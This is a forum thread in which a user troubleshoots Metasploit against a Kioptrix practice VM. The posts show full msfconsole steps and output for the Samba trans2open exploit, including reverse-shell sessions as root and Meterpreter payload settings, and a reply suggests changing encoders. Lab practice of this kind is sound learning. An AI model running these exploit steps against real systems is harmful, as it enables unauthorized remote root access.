Thread: Metasploit meterpreter

  1. #1
    Join Date
    2013-Mar
    Location
    Canada
    Posts
    31

    Metasploit meterpreter

    so i created a vm and put kioptrix
    ran metasploit and used the samba exploit (exploit/linux/samba/trans2open)

    it was successful
    then tried to use meterpreter however it would not connect

    i was able to get the shell session but not meterpreter
    no errors, it just keeps on trying

    anyone had similar issues?
    “A goal without a plan is just a wish.”

  2. #2
    Join Date
    2013-Apr
    Posts
    126
    Can you show us a trace of exactly what you did and the output, so we can have a better idea of your problem?

  3. #3
    Join Date
    2013-Mar
    Location
    Canada
    Posts
    31
    msf > use exploit/linux/samba/trans2open

    msf exploit(trans2open) > set RHOST 192.168.1.108
    RHOST => 192.168.1.108
    msf exploit(trans2open) > show options

    Module options (exploit/linux/samba/trans2open):

    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST  192.168.1.108    yes       The target address
    RPORT  139              yes       The target port


    Exploit target:

    Id  Name
    --  ----
    0   Samba 2.2.x - Bruteforce


    msf exploit(trans2open) >
    msf exploit(trans2open) > sessions

    Active sessions
    ===============

    No active sessions.

    msf exploit(trans2open) > exploit
    [*] Started reverse handler on 192.168.1.140:4444
    [*] Trying return address 0xbffffdfc...
    [*] Trying return address 0xbffffcfc...
    [*] Trying return address 0xbffffbfc...
    [*] Trying return address 0xbffffafc...
    [*] Trying return address 0xbffff9fc...
    [*] Command shell session 1 opened (192.168.1.140:4444 -> 192.168.1.108:32769) at 2013-05-20 10:34:05 -0400
    [*] Command shell session 2 opened (192.168.1.140:4444 -> 192.168.1.108:32770) at 2013-05-20 10:34:06 -0400


    exit
    [*] 192.168.1.108 - Command shell session 2 closed. Reason: Died from EOFError
    msf exploit(trans2open) > show payloads

    Compatible Payloads
    ===================

    Name                                    Disclosure Date  Rank    Description
    ----                                    ---------------  ----    -----------
    generic/custom                                           normal  Custom Payload
    generic/debug_trap                                       normal  Generic x86 Debug Trap
    generic/shell_bind_tcp                                   normal  Generic Command Shell, Bind TCP Inline
    generic/shell_reverse_tcp                                normal  Generic Command Shell, Reverse TCP Inline
    generic/tight_loop                                       normal  Generic x86 Tight Loop
    linux/x86/adduser                                        normal  Linux Add User
    linux/x86/chmod                                          normal  Linux Chmod
    linux/x86/exec                                           normal  Linux Execute Command
    linux/x86/meterpreter/bind_ipv6_tcp                      normal  Linux Meterpreter, Bind TCP Stager (IPv6)
    linux/x86/meterpreter/bind_nonx_tcp                      normal  Linux Meterpreter, Bind TCP Stager
    linux/x86/meterpreter/bind_tcp                           normal  Linux Meterpreter, Bind TCP Stager
    linux/x86/meterpreter/reverse_ipv6_tcp                   normal  Linux Meterpreter, Reverse TCP Stager (IPv6)
    linux/x86/meterpreter/reverse_nonx_tcp                   normal  Linux Meterpreter, Reverse TCP Stager
    linux/x86/meterpreter/reverse_tcp                        normal  Linux Meterpreter, Reverse TCP Stager
    linux/x86/metsvc_bind_tcp                                normal  Linux Meterpreter Service, Bind TCP
    linux/x86/metsvc_reverse_tcp                             normal  Linux Meterpreter Service, Reverse TCP Inline
    linux/x86/read_file                                      normal  Linux Read File
    linux/x86/shell/bind_ipv6_tcp                            normal  Linux Command Shell, Bind TCP Stager (IPv6)
    linux/x86/shell/bind_nonx_tcp                            normal  Linux Command Shell, Bind TCP Stager
    linux/x86/shell/bind_tcp                                 normal  Linux Command Shell, Bind TCP Stager
    linux/x86/shell/reverse_ipv6_tcp                         normal  Linux Command Shell, Reverse TCP Stager (IPv6)
    linux/x86/shell/reverse_nonx_tcp                         normal  Linux Command Shell, Reverse TCP Stager
    linux/x86/shell/reverse_tcp                              normal  Linux Command Shell, Reverse TCP Stager
    linux/x86/shell_bind_ipv6_tcp                            normal  Linux Command Shell, Bind TCP Inline (IPv6)
    linux/x86/shell_bind_tcp                                 normal  Linux Command Shell, Bind TCP Inline
    linux/x86/shell_reverse_tcp                              normal  Linux Command Shell, Reverse TCP Inline
    linux/x86/shell_reverse_tcp2                             normal  Linux Command Shell, Reverse TCP Inline - Metasm Demo

    msf exploit(trans2open) > set payload linux/x86/meterpreter/bind_tcp
    payload => linux/x86/meterpreter/bind_tcp
    msf exploit(trans2open) > show options

    Module options (exploit/linux/samba/trans2open):

    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST  192.168.1.108    yes       The target address
    RPORT  139              yes       The target port


    Payload options (linux/x86/meterpreter/bind_tcp):

    Name          Current Setting  Required  Description
    ----          ---------------  --------  -----------
    DebugOptions  0                no        Debugging options for POSIX meterpreter
    LPORT         4444             yes       The listen port
    PrependFork                    no        Add a fork() / exit_group() (for parent) code
    RHOST         192.168.1.108    no        The target address


    Exploit target:

    Id  Name
    --  ----
    0   Samba 2.2.x - Bruteforce


    now when i run exploit i get the following...it keeps on going with trying to find a return address



    msf exploit(trans2open) > exploit
    [*] Started bind handler
    [*] Trying return address 0xbffffdfc...
    [*] Trying return address 0xbffffcfc...
    [*] Trying return address 0xbffffbfc...
    [*] Trying return address 0xbffffafc...
    [*] Transmitting intermediate stager for over-sized stage...(100 bytes)
    [*] Trying return address 0xbffff9fc...
    [*] Sending stage (1126400 bytes) to 192.168.1.108
    [*] Trying return address 0xbffff8fc...
    [*] Trying return address 0xbffff7fc...
    [*] Trying return address 0xbffff6fc...
    [*] Trying return address 0xbffff5fc...
    [*] Trying return address 0xbffff4fc...
    [*] Trying return address 0xbffff3fc...
    [*] Trying return address 0xbffff2fc...
    [*] Trying return address 0xbffff1fc...
    [*] Trying return address 0xbffff0fc...
    [*] Trying return address 0xbfffeffc...
    [*] Trying return address 0xbfffeefc...
    [*] Trying return address 0xbfffedfc...
    [*] Trying return address 0xbfffecfc...
    [*] Trying return address 0xbfffebfc...
    [*] Trying return address 0xbfffeafc...
    [*] Trying return address 0xbfffe9fc...
    [*] Trying return address 0xbfffe8fc...
    [*] Trying return address 0xbfffe7fc...
    [*] Trying return address 0xbfffe6fc...
    Last edited by nix; 2013-05-20 at 14:43.
    “A goal without a plan is just a wish.”

  4. #4
    Join Date
    2013-Mar
    Location
    Canada
    Posts
    31
    i even tried the Payload options (linux/x86/meterpreter/reverse_tcp):

    and set the LHOST to my machine but i get the same thing

    i'm able to get a shell and i'm fully logged in to the system as root but i can't get meterpreter to work.
    “A goal without a plan is just a wish.”

  5. #5
    Join Date
    2013-Apr
    Posts
    126
    Looks like the shellcode is somehow broken, try to play with the encoders to use at run-time. Not sure if this will solve the problem.

  6. #6
    Join Date
    2013-Mar
    Location
    Canada
    Posts
    31
    i'm not sure i understand...what do you mean the shellcode is broken? do you mean the payload?

    thanks

    Nix
    “A goal without a plan is just a wish.”
